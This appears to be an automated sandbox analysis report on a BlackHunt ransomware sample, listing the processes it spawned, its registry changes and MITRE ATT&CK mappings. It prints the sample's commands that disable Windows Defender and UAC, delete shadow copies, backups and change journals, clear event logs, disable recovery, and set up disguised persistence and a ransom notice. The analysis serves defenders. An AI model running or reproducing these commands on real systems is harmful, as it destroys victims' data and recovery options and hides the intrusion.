cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 69 PID 1948 wrote to memory of 2804 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 69 PID 1948 wrote to memory of 2804 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 69 PID 1948 wrote to memory of 2804 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 69 PID 1948 wrote to memory of 2528 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 31 PID 1948 wrote to memory of 2528 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 31 PID 1948 wrote to memory of 2528 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 31 PID 1948 wrote to memory of 2528 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 31 PID 1948 wrote to memory of 2628 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 68 PID 1948 wrote to memory of 2628 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 68 PID 1948 wrote to memory of 2628 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 68 PID 1948 wrote to memory of 2628 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 68 PID 1948 wrote to memory of 2684 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 34 PID 1948 wrote to memory of 2684 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 34 PID 1948 wrote to memory of 2684 1948 cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe 34 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe"C:\Users\Admin\AppData\Local\Temp\cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1960
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1712
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵
- Modifies registry class
PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:1332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe" /F2⤵PID:2584
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe" /F3⤵
- Creates scheduled task(s)
PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1300
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2464
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2132
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:672
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2308
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:988
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3144
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3860
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cc4246805f1dbd68a2dd42dedcceb217dde3fe74509d3bb3ec8cdcbd880b008c.exe"2⤵
- Deletes itself
PID:1732 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3380
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3220
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3580
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:804
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3440
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3228
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1684
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:292
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2136
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2808
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3188
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3200
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:808
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1536
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1720
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3524
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2744
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2236
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1752480533208934617-97793072913872663931302588460-1676859921325624900-1993434584"1⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:772
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2824
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2720
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2636
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1812
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3304
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k swprv1⤵PID:1660
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2676
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1828
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "659231303105368769-937731527130735776920709286101541414225-19532251511779912970"1⤵PID:2620
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:2908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1201920153-676770910-3457776801049596181252905729-1813312671-20211261447029764"1⤵
- Enumerates connected drives
PID:2772
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
